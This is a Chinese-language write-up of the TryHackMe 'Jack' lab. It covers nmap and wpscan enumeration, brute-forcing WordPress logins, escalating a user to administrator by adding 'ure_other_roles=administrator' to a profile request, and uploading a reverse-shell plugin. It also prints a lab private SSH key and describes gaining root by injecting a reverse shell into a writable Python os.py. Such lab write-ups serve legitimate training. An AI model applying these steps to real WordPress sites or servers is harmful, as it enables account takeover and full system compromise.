简介

TryHackMe上的hard难度靶机。给我们提供了一个WordPress普通权限用户提权的思路：利用User Role Editor插件的漏洞，此漏洞广泛存在所以挺有价值的。提权部分用到了python库注入方法，也是一种好思路,值得学习。

记得开始前在hosts里面加上jack.thm对应的ip，不然网页可能无法正常加载。

信息收集

端口扫描：

┌──(kali㉿kali)-[~/THM/Jack/workSpace]
└─$ sudo nmap -p- --min-rate=10000 10.10.183.69  
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-06 14:36 CST
Nmap scan report for 10.10.183.69
Host is up (0.26s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 12.85 seconds

省流：22，80

TCP、服务、OS扫描：

┌──(kali㉿kali)-[~/THM/Jack/workSpace]
└─$ sudo nmap -sT -sV -sC -O -p22,80 10.10.183.69   
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-06 14:37 CST
Nmap scan report for 10.10.183.69
Host is up (0.25s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3e7978089331d0837fe2bcb614bf5d9b (RSA)
|   256 3a679faf7e66fae3f8c754496338a293 (ECDSA)
|_  256 8cef55b023732c14094522ac84cb40d2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: WordPress 5.3.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-title: Jack's Personal Site – Blog for Jacks writing adven...
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 5.4 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 7.1.1 - 7.1.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.27 seconds

关键信息：WordPress

nmap脚本漏扫：

┌──(kali㉿kali)-[~/THM/Jack/workSpace]
└─$ sudo nmap --script=vuln 10.10.183.69         
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-06 14:40 CST
Nmap scan report for 10.10.183.69
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-wordpress-users: 
| Username found: jack
| Username found: wendy
| Username found: danny
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /wp-json: Possible admin folder
|   /robots.txt: Robots file
|   /readme.html: Wordpress version: 2 
|   /: WordPress version: 5.3.2
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|   /readme.html: Interesting, a readme.
|_  /0/: Potentially interesting folder
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.183.69
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.183.69:80/
|     Form id: search
|_    Form action: http://jack.thm

Nmap done: 1 IP address (1 host up) scanned in 350.71 seconds

省流:给我们枚举出了wordpress的三个用户名以及一些目录

nikto：

┌──(kali㉿kali)-[~/THM/Jack/workSpace]
└─$ sudo nikto -h http://10.10.183.69
[sudo] password for kali: 
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.183.69
+ Target Hostname:    10.10.183.69
+ Target Port:        80
+ Start Time:         2023-06-06 15:56:18 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Drupal Link header found with value: <http://jack.thm/index.php/wp-json/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /FwkQXLWd.: Uncommon header 'x-redirect-by' found, with contents: WordPress.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Operation now in progress
+ Scan terminated: 20 error(s) and 7 item(s) reported on remote host
+ End Time:           2023-06-06 16:19:09 (GMT8) (1371 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

没啥多的信息而且扫了贼久，估计是网的原因。

web渗透

所有信息都指向wordpress了。先wpscan扫一下。

┌──(kali㉿kali)-[~/THM/Jack/workSpace]
└─$ sudo wpscan --url http://jack.thm -e
[sudo] password for kali: 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://jack.thm/ [10.10.183.69]
[+] Started: Tue Jun  6 15:01:47 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://jack.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://jack.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://jack.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://jack.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://jack.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://jack.thm/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
 |  - http://jack.thm/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: online-portfolio
 | Location: http://jack.thm/wp-content/themes/online-portfolio/
 | Last Updated: 2021-07-30T00:00:00.000Z
 | Readme: http://jack.thm/wp-content/themes/online-portfolio/readme.txt
 | [!] The version is out of date, the latest version is 0.1.0
 | Style URL: http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2
 | Style Name: Online Portfolio
 | Style URI: https://www.amplethemes.com/downloads/online-protfolio/
 | Description: Online Portfolio WordPress portfolio theme for building personal website. You can take full advantag...
 | Author: Ample Themes
 | Author URI: https://amplethemes.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 0.0.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2, Match: 'Version: 0.0.7'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:31 <=============> (500 / 500) 100.00% Time: 00:00:31
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:02:38 <===========> (2575 / 2575) 100.00% Time: 00:02:38

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:09 <==============> (137 / 137) 100.00% Time: 00:00:09

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:04 <====================> (71 / 71) 100.00% Time: 00:00:04

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:06 <=========> (100 / 100) 100.00% Time: 00:00:06

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:02 <===============> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] jack
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://jack.thm/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] wendy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] danny
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jun  6 15:05:49 2023
[+] Requests Done: 3444
[+] Cached Requests: 11
[+] Data Sent: 910.723 KB
[+] Data Received: 1.393 MB
[+] Memory used: 266.402 MB
[+] Elapsed time: 00:04:01

出来的信息还是用户名。

WP-爆破

先cewl根据网站信息生成一下字典，看看能不能成。

cewl http://jack.thm > cewlpass

再用wpscan爆破一下,然而没有成功。

那就只能试试rockyou.txt这个字典了，先后台挂着sudo wpscan --url http://jack.thm -U user -P /usr/share/wordlists/rockyou.txt

那我们就手动看看网页吧。

经典wordpress站，看了下感觉只有login页面对我们最有用，然而后台用rockyou爆破太慢了，而且因为网络原因经常请求超时，thm的openvpn节点不是很稳定。

Error: Request timed out.                                                   
Error: Request timed out.                                                   
Error: Request timed out.                                                   
Error: Request timed out.                                                   
trying jack / hamilton Time: 00:17:18 <             > (5995 / 43033176)  0.01%  ETA: ??:??:??

那就再拿个小点的字典试试吧，kali自带的字典还有一个fasttrack，试试这个吧。

等了一会，发现爆破出了wendy的密码。

┌──(kali㉿kali)-[~/THM/Jack/workSpace]
└─$ sudo wpscan --url http://jack.thm -U user -P /usr/share/wordlists/fasttrack.txt 
[sudo] password for kali: 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://jack.thm/ [10.10.183.69]
[+] Started: Tue Jun  6 16:26:36 2023


[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - wendy / changelater                                                              
Trying danny / starwars Time: 00:01:54 <=============     > (646 / 868) 74.42%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: wendy, Password: changelater

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jun  6 16:28:55 2023
[+] Requests Done: 818
[+] Cached Requests: 7
[+] Data Sent: 371.288 KB
[+] Data Received: 610.033 KB
[+] Memory used: 244.953 MB
[+] Elapsed time: 00:02:18

我们当然先用wendy / changelater试试ssh登录，然而不行，那就先等进后台吧。

看了一圈也没啥发现，就是一个普通用户，也没有什么其他的plugin。看看hint：ure_other_roles查了一下，发现这是个USER ROLE PLUGIN插件，基本是wordpress后台自带的插件。

我们查一下exp-db，发现有一个用ruby写的可以在metasploit用的exp。但是懒得开msf了，其实手动方法也很简单，网上也有相关资料WordPress Plugin User Role Editor < 4.24 - Privilege Escalation。

我们直接来手动利用。

WP-PLUGIN URE exploit

这个漏洞是否存在识别起来其实有点玄学，因为URE插件版本一般看不出来，但是我们都可以尝试，只要在后台侧边栏有user或者profile用于让用户修改自己的profile，我们就可以试试。毕竟现在这个插件最先也就4.6版本，小于4.24都能用。

我们先点击页面里的update按钮，这会生成一个请求：

此时，我们在POST请求最后加上&ure_other_roles=administrator把自己编辑成为管理员：

然后就能成功升级成管理员权限。这个漏洞的原因是URE插件对于用户更新profile时没有进行严格的身份验证，这就导致了用户可以将自己添加为管理员。

而当我们拿到了wordpress的管理员权限，事情一下就简单了起来。因为有我们最喜欢的theme edit以及plugin upload拿shell方法。

上传反弹shell

然而，在我们直接编辑主题模版时，会出现错误，让我们无法成功编辑。

无所谓，插件安装会出手。

我们直接编辑好反弹shell，传上去。

上传好后在/wp-content/uploads里面就能找到。

直接访问就能拿到shell。

┌──(kali㉿kali)-[~/THM/Jack/workSpace]
└─$ sudo nc -lvp 443                 
[sudo] password for kali: 
listening on [any] 443 ...
connect to [10.11.40.37] from jack.thm [10.10.183.69] 34350
bash: cannot set terminal process group (1123): Inappropriate ioctl for device
bash: no job control in this shell
www-data@jack:/var/www/html/wp-content/uploads/2023/06$ uname -a
uname -a
Linux jack 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
www-data@jack:/var/www/html/wp-content/uploads/2023/06$

成功拿shell，userflag在jack的home目录下，且可以直接查看。

提权

www-data的权限一如既往的不理想，不知道密码，sudo -l用不了，也没有啥SUID可用的二进制文件，单看定时任务也没有什么特别的。

手动枚举

先看/home目录，里面只有一个用户jack。看看他的home目录。

www-data@jack:/home/jack$ ls -la
ls -la
total 36
drwxr-xr-x 4 jack jack 4096 Jan 10  2020 .
drwxr-xr-x 3 root root 4096 Jan  8  2020 ..
lrwxrwxrwx 1 jack jack    9 Jan 10  2020 .bash_history -> /dev/null
-rw-r--r-- 1 jack jack  220 Jan  8  2020 .bash_logout
-rw-r--r-- 1 jack jack 3771 Jan  8  2020 .bashrc
drwx------ 2 jack jack 4096 Jan  9  2020 .cache
-rw-r--r-- 1 jack jack  655 Jan  8  2020 .profile
drwx------ 2 jack jack 4096 Jan 10  2020 .ssh
-rw-r--r-- 1 root root  140 Jan 10  2020 reminder.txt
-rw-rw-r-- 1 jack jack   33 Jan 10  2020 user.txt
www-data@jack:/home/jack$ cat user      
cat user.txt 
********************************
www-data@jack:/home/jack$ cat re 
cat reminder.txt 

Please read the memo on linux file permissions, last time your backups almost got us hacked! Jack will hear about this when he gets back.

www-data@jack:/home/jack$ cat .bash_history
cat .bash_history
www-data@jack:/home/jack$ 

reminder给我们带来了很重要的信息，系统里面有个B喜欢备份重要文件。那我们直奔/var/backups看看。

www-data@jack:/var/backups$ ls -la
ls -la
total 776
drwxr-xr-x  2 root root     4096 Jan 10  2020 .
drwxr-xr-x 14 root root     4096 Jan  9  2020 ..
-rw-r--r--  1 root root    40960 Jan  9  2020 alternatives.tar.0
-rw-r--r--  1 root root     9931 Jan  9  2020 apt.extended_states.0
-rw-r--r--  1 root root      713 Jan  8  2020 apt.extended_states.1.gz
-rw-r--r--  1 root root       11 Jan  8  2020 dpkg.arch.0
-rw-r--r--  1 root root       43 Jan  8  2020 dpkg.arch.1.gz
-rw-r--r--  1 root root      437 Jan  8  2020 dpkg.diversions.0
-rw-r--r--  1 root root      202 Jan  8  2020 dpkg.diversions.1.gz
-rw-r--r--  1 root root      207 Jan  9  2020 dpkg.statoverride.0
-rw-r--r--  1 root root      129 Jan  8  2020 dpkg.statoverride.1.gz
-rw-r--r--  1 root root   552673 Jan  9  2020 dpkg.status.0
-rw-r--r--  1 root root   129487 Jan  8  2020 dpkg.status.1.gz
-rw-------  1 root root      813 Jan 10  2020 group.bak
-rw-------  1 root shadow    679 Jan 10  2020 gshadow.bak
-rwxrwxrwx  1 root root     1675 Jan 10  2020 id_rsa
-rw-------  1 root root     1626 Jan  9  2020 passwd.bak
-rw-------  1 root shadow   1066 Jan 10  2020 shadow.bak
www-data@jack:/var/backups$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxfBR9F9V5G2snv1Xaaxv3VHbFZ2VZRwGyU+ah6komBeaAldr
8SNK1x0wu/eXjLjrWnVaYOEU2YUrHzn/duB3Wvm8xyA0T8x/WbV2osWaVOafkPSv
YpV4OdQrdRoS3PEOXRnS+CnOTAgPWo2+xfH1XeldFw9XiYrprTugmwCcYDuBZB3r
zmWA8sPWjLjs6xzNK26RQQbo9zaxwfEdjZ3an9JngJJ7m0rtF9vKeCRfO1V8sd/t
1lu96Kqn4FZUTXQFEGfAYupG6b3vpRwqmI6y2VjK5MxlMmEdwP8oxmKR4XRqvSK1
8m5byz8ZUu1RfB8Ug/pKK9VVbk9QFWbrV4E3FwIDAQABAoIBAEEr0TAOu68MVUu7
yi4m8mYCb4n8apXx1mIt7YlBLvZ0vuaKdiXdIuUU3VjmOmXA9OzButIvCbhc2kfb
xrsTSPkRRRCjD9Y+VKfq0XbibOALVvpZNe3VnNIdg3l47kEEtV/+ArJmwV/TP4rn
JKrz8X/MODRBfubwb+Pzv/uJBfPAzvkokKUp9D2LqNjQEY4w71j0yUl+A0xnkT4i
L1FbzghdARExy2cJN0RfdDKhy/DfXos7+JHso3ZvXmSx0ivS+HyCblO25Kcmy4Vh
FZotNk+28iw6DKm1wrgAjj0sdLpB6jW9+M/kSQCovMijPM8h8JNPLNOJMFSKWBH8
m9US/XECgYEA+AW0bbMVoylAcWGold85Ileyuw/q3HwsDdRrO43uMZvQe8f5TRsd
Q9SvAEz9T46YErySq33jOPmsGLf02EEiyGggpBiuhi3FmtMa7440qGFig4Q5IVxn
QuSDUQvxN/uVE+TZxlRPTUeAFPcAI4DAUYbubAcJzvXeAsCPsKbQGw0CgYEAzE42
H8SUWiCMXBMotEUpn14pGcP4O+hei9j7P1Nupy/F63UtYPvXN4oi75YeLiInUXzU
S/r3+AxoNafMAy67oQhLKHXs+NOP5aEkVhNDhHFNpWutYPn9aLWUIx1tXbWsaecE
i7OCxjp0L5lDRVl3TLzXeZmtp0oSAPKNRYmgQbMCgYAvL0aoKA3RwKNV7rJX8OO5
uN1z4Q9ZavYmm2bbKaFLJs1+/whatvHWWbwBXqRCYmpkBiQRJB36VOV8vmKCUcIA
Rm8PSPLK7CJP1iGluXQjJIPNaXZE9oNeooKpBJCbie1On5ceuCNuHFAtrOAF4RS1
beol+yDOks/tzhyICvREcQKBgCHIiRClu/ZPTYZoMKHmkeRleJxnGGQnn4K2hY1K
KZEByFOQE8nmuwbXE8HUa/cq9J936c8Kl/hvbMf6kDSyhJozOeJd5aqbqT7Kb6zA
ELkU10cUUB4qGGo5JF7OHeiSAwmcBtdm/qfywIWibUpJaf3JeEQGUn3INMPtV8j4
4gQbAoGBAKuXPITKuO7SsRfXcwB3MO3iCTLdW7BYnYF1SzVbPBonmcsxlQinvoRg
2faWmSFAUK6cIys9za3pzOw3FP8W9Q5SGsA9KriSYj6/h7ei9GeJAr3mxlbGnkZN
ZFqUVe2Jvxq++O6Ub41zUtWINbR5Fxf+kTlJIIwqc6IuzZq+QWXy
-----END RSA PRIVATE KEY-----

喜提ssh登录密钥。

尝试了下root没有成功（当然没这么简单），那就只剩下jack这个选项了，成功登录。

ssh jack@10.10.237.140 -i root_rsa

python库注入

然而因为我们是ssh登录的jack用户，并不知道密码，sudo -l显然是用不了了。在我们四处查看下，发现了/opt下有东西，还是python文件，这不是很寻常。一般这里应没啥东西才对。（你问我为啥要看的/opt的话是因为以前打的靶机里面就有藏B喜欢在这个目录下藏东西，只能说是吃一堑长一智了，反正就ls一下的事）没有这个思路的话其实用linpeas扫一下也会报给你/opt下有不常见目录，看一下就好。

然而这个checker.py文件当前用户只能看，不能读和执行，看看内容吧那就。

jack@jack:/opt/statuscheck$cat checker.py
import os

os.system("/usr/bin/curl -s -I http://127.0.0.1 >/opt/statuscheck/output.log")

内容就是向同目录下的output.log写入。我们查看output.log文件发现其内容是每隔一段时间就更新一次。所以checker的作用就是定时写入日志，而且显然是以root身份执行的。找了一下也不知道这个定时任务到底如何触发，在哪执行的。但是我们能知道的是他一定是定时在执行。

可是我们也没有权限修改这个文件，并且curl也是绝对路径写的，想利用PATH估计是没戏的，而且我们大概率改不了/usr/bin的curl文件。难道这条路走不通吗。

不死心，在搜索引擎查一下root权限的python文件如何利用。

发现有博客提供了几种python文件提权的方式。

提到了库劫持。

文件中import了os库，我们试试能不能劫持。

我们先寻找os库文件位置以及查看是否有权限，因为一般而言这些目录多半只有root才能编辑。

jack@jack:/opt/statuscheck$locate os.py
/usr/lib/python2.7/os.py
/usr/lib/python2.7/os.pyc
/usr/lib/python2.7/encodings/palmos.py
/usr/lib/python2.7/encodings/palmos.pyc
/usr/lib/python3/dist-packages/LanguageSelector/macros.py
/usr/lib/python3.5/os.py
/usr/lib/python3.5/encodings/palmos.py
jack@jack:/opt/statuscheck$ls -l /usr/lib/python2.7/os.py
-rw-rw-r-x 1 root family 25908 Nov 16 2020 /usr/lib/python2.7/os.py
jackajack:/opt/statuscheck$id
uid=1000(jack)gid=1000(jack)groups=1000(jack),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin)
116(sambashare),1001(family)

我们发现竟然family组就能编辑os库文件，而jack用户正好是该组的用户。那我们直接vim往os库里注入我们的反弹shell，这样checker.py调用库的时候就会给我们弹回反弹root shell。按理来说，我们应该在os库里system函数中注入我们的payload，然而我找了半天没找到在哪，所以只能写在最后试试了。

写完之后可以用tail -f output.log实时查看文件有没有更新，如果更新了就说明checker执行了， 那应该就会给我们弹回来shell。

┌──(kali㉿kali)-[~/THM/Jack/workSpace]
└─$ sudo nc -lvp 8080
[sudo] password for kali: 
listening on [any] 8080 ...
connect to [10.8.134.236] from jack.thm [10.10.237.140] 43558
bash: cannot set terminal process group (2730): Inappropriate ioctl for device
bash: no job control in this shell
root@jack:~# ls -la
ls -la
total 28
drwxr-x--x  4 root root 4096 Nov 16  2020 .
drwxr-xr-x 23 root root 4096 Jan  8  2020 ..
lrwxrwxrwx  1 root root    9 Jan 10  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
drwx------  2 root root 4096 Nov 16  2020 .cache
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-r--------  1 root root   33 Jan 10  2020 root.txt
drwxr-xr-x  2 root root 4096 Nov 16  2020 .ssh
root@jack:~# cat root.txt
cat root.txt
*****************************
root@jack:~#

成功拿到root flag。